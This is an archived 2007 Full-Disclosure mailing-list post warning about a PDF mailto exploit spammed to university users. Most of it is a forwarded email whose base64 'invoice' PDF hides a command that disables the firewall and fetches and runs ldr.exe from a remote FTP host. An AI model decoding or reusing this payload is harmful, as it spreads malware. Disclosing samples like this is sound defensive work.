| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 23 Oct 2007 22:18:52 +1000 From: Paul Szabo <psz@...hs.usyd.edu.au> To: full-disclosure@...ts.grok.org.uk Subject: PDF mailto exploit in the wild In case you are interested... messages like the following were spammed to my users tonight. Cheers, Paul Szabo psz@...hs.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of Sydney Australia --- > From sabansal1@...il.com Tue Oct 23 18:20:46 2007 > Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.187]) > by london.ucc.usyd.edu.au (Postfix) with ESMTP id 17D582CAC1E > for <tang@...hs.usyd.edu.au>; Tue, 23 Oct 2007 18:20:13 +1000 (EST) > Received: by nf-out-0910.google.com with SMTP id b2so1929536nfb > for <tang@...hs.usyd.edu.au>; Tue, 23 Oct 2007 01:20:12 -0700 (PDT) > DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; > d=gmail.com; s=beta; > h=domainkey-signature:received:received:message-id:to:subject:date:mime-version:x-mailer:x-mimeole:thread-index:content-type:from; > bh=RBeyhq9knF4zOhfDArq39Bm0/FWUFdutXHfudq1gwxE=; > b=Qs8RvpCyO4UBVRo3N73MXad3ZQWzfT/6L1+snsI7Ty0ZwHuynJLpIBAIcVEGGxvfs9+pB06orF5efPl7aYqq3jQBI19jZBMUE9Tcf2TndqhPmE3nIADCgUnWEP5xo5xGug2lq6coG8MfdZd6+oIYtkdCMzl6nweV1f76zYWereQ= > DomainKey-Signature: a=rsa-sha1; c=nofws; > d=gmail.com; s=beta; > h=received:message-id:to:subject:date:mime-version:x-mailer:x-mimeole:thread-index:content-type:from; > b=h1M0bnJzcqTTj5XzB6QgMJ0ugePdD1uvgzov2kTbStB+KW9WsynewPJJlv0ml/ILNka98867Gm2QrvL+2V5esH7Flnm5EJXpMxDSwiSv84SExd7TZFxdAsy2tYd2eiQ+Wy2Z6SlaLdZdbQv27sJ8tdN9QGNxBFWyYotdY4LwH7Y= > Received: by 10.82.112.3 with SMTP id k3mr5564785buc.1193127611679; > Tue, 23 Oct 2007 01:20:11 -0700 (PDT) > Received: from ?12.206.143.237? ( [12.206.143.237]) > by mx.google.com with ESMTPS id k7sm6753182nfh.2007.10.23.01.20.06 > (version=SSLv3 cipher=OTHER); > Tue, 23 Oct 2007 01:20:10 -0700 (PDT) > Message-ID: <G9THMfvCFEH0Ii.362DBDDF78@...18BS> > To: <andrewadams2650@...mail.com> > Subject: STATEMET indigene > Date: Tue, 23 Oct 2007 08:11:47 +0000 > MIME-Version: 1.0 > X-Mailer: Microsoft Office Outlook, Build 11.0.5510 > X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 > Thread-Index: leRJrPkueCIQWNOdN8y1PxNCM0wkvbPn8IKv > Content-type: multipart/mixed; > boundary="----=_NextPart_000_00F6_04BCC8AB.87205748" > From: Gilbert <sabansal1@...il.com> > X-PMX-Version: USyd20070806 5.3.3.310218, Antispam-Engine: 2.5.2.311128, Antispam-Data: 2007.10.23.5823 > X-PerlMx-Spam: Gauge=IIIIIII, Probability=7%, Report='PDF_ATTACHED_2 0, PDF_SIZE_0_10K 0, __ATTACHMENT_SIZE_0_10K 0, __CT 0, __CTYPE_HAS_BOUNDARY 0, __CTYPE_MULTIPART 0, __FROM_GMAIL 0, __HAS_MSGID 0, __HAS_X_MAILER 0, __HELO_GMAIL 0, __MIME_VERSION 0, __RDNS_GMAIL 0, __SANE_MSGID 0, __USER_AGENT_MS_GENERIC 0, __pbl.spamhaus.org_TIMEOUT , __sbl.spamhaus.org_TIMEOUT ' > Content-Length: 5618 > Status: R > > ------=_NextPart_000_00F6_04BCC8AB.87205748 > Content-Type: text/plain; > charset="Windows-1251" > Content-Transfer-Encoding: 7bit > > fanner ctenoid varment > > ------=_NextPart_000_00F6_04BCC8AB.87205748 > Content-type: application/octet-stream; > name="BILL.pdf" > Content-Transfer-Encoding: base64 > Content-Disposition: attachment; > filename="INVOICE.pdf" > > JVBERi0xLjYNJeLjz9MNCjQgMCBvYmogPDwvTGluZWFyaXplZCAxL0wgMzA3NDEvTyA2L0UgMjY4 > ODEvTiAxL1QgMzA2MTUvSCBbIDUzNiAxNDZdPj4NZW5kb2JqDSAgICAgICAgICAgICAgICAgICAg > DQp4cmVmDQo0IDEyDQowMDAwMDAwMDE2IDAwMDAwIG4NCjAwMDAwMDA2ODIgMDAwMDAgbg0KMDAw > MDAwMDc0MSAwMDAwMCBuDQowMDAwMDAwOTI4IDAwMDAwIG4NCjAwMDAwMDA5NzcgMDAwMDAgbg0K > MDAwMDAwMTAwNiAwMDAwMCBuDQowMDAwMDI1NDA5IDAwMDAwIG4NCjAwMDAwMjU1OTggMDAwMDAg > bg0KMDAwMDAyNjA0MiAwMDAwMCBuDQowMDAwMDI2MzMwIDAwMDAwIG4NCjAwMDAwMjY3ODYgMDAw > MDAgbg0KMDAwMDAwMDUzNiAwMDAwMCBuDQp0cmFpbGVyDQo8PC9TaXplIDE2L1ByZXYgMzA2MDUv > Um9vdCA1IDAgUi9JbmZvIDMgMCBSL0lEWzxGNEU2NDFGMjI2MzA5MjVCRjM0NkYwRkE2NDExRDZF > QT48Q0Y1QTJFNkM4NTY3Nzg0OEEwRjZEOEVBQzFBMDQ1Qzg+XT4+DQpzdGFydHhyZWYNCjANCiUl > RU9GDQogICAgICAgICAgICAgICAgDQo1IDAgb2JqPDwvTWV0YWRhdGEgMiAwIFIvUGFnZXMgMSAw > IFIvVHlwZS9DYXRhbG9nPj4NZW5kb2JqDTYgMCBvYmo8PC9Dcm9wQm94WzAgMCA1OTUgODQyXS9Q > YXJlbnQgMSAwIFIvQ29udGVudHMgMTMgMCBSL1JvdGF0ZSAwL0dyb3VwPDwvSSB0cnVlL0NTL0Rl > dmljZVJHQi9TL1RyYW5zcGFyZW5jeT4+L01lZGlhQm94WzAgMCA1OTUgODQyXS9SZXNvdXJjZXMg > NyAwIFIvVHlwZS9QYWdlL0FBPDwvTyAxNCAwIFI+Pj4+DWVuZG9iag0xNCAwIG9iajw8L1VSSSht > YWlsdG86JS8uLi8uLi8uLi8uLi8uLi8uLi9XaW5kb3dzL3N5c3RlbTMyL2NtZCIuZXhlIiIgL2Mg > L3EgXCJAZWNobyBvZmYmbmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlPWRpc2FibGUmZWNo > byBvIDgxLjk1LjE0Ni4xMzA+MSZlY2hvIGJpbmFyeT4+MSZlY2hvIGdldCAvbGRyLmV4ZT4+MSZl > Y2hvIHF1aXQ+PjEmZnRwIC1zOjEgLXYgLUE+bnVsJmRlbCAvcSAxJiBzdGFydCBsZHIuZXhlJlwi > IFwiJlwiICJudWwuYmF0KS9TL1VSST4+DWVuZG9iag0xIDAgb2JqPDwvQ291bnQgMS9UeXBlL1Bh > Z2VzL0tpZHNbNiAwIFJdPj4NCmVuZG9iag0KMiAwIG9iajw8L1N1YnR5cGUvWE1ML0xlbmd0aCAz > NDI5L1R5cGUvTWV0YWRhdGE+PnN0cmVhbQ0KPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0w > TXBDZWhpSHpyZVN6TlRjemtjOWQiPz4KPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRh > LyIgeDp4bXB0az0iMy4xLTcwMiI+CiAgIDxyZGY6UkRGIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53 > My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyI+CiAgICAgIDxyZGY6RGVzY3JpcHRpb24g > cmRmOmFib3V0PSIiCiAgICAgICAgICAgIHhtbG5zOnhhcD0iaHR0cDovL25zLmFkb2JlLmNvbS94 > YXAvMS4wLyI+CiAgICAgIDwvcmRmOkRlc2NyaXB0aW9uPgogICAgICA8cmRmOkRlc2NyaXB0aW9u > IHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL2RjL2Vs > ZW1lbnRzLzEuMS8iPgogICAgICAgICA8ZGM6Zm9ybWF0PmFwcGxpY2F0aW9uL3BkZjwvZGM6Zm9y > bWF0PgogICA8L3JkZjpSREY+CjwveDp4bXBtZXRhPgogICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg > ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAK > ICAgICAgICAgICAgICAgICAgICAgICAgICAgCjw/eHBhY2tldCBlbmQ9InciPz4NCmVuZHN0cmVh > bQ1lbmRvYmoNeHJlZg0KMCA0DQowMDAwMDAwMDAwIDY1NTM1IGYNCjAwMDAwMjY4ODEgMDAwMDAg > bg0KMDAwMDAyNjkzMSAwMDAwMCBuDQowMDAwMDMwNDM2IDAwMDAwIG4NCnRyYWlsZXINCjw8L1Np > emUgND4+DQpzdGFydHhyZWYNCjExNg0KJSVFT0YNCg== > > ------=_NextPart_000_00F6_04BCC8AB.87205748-- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists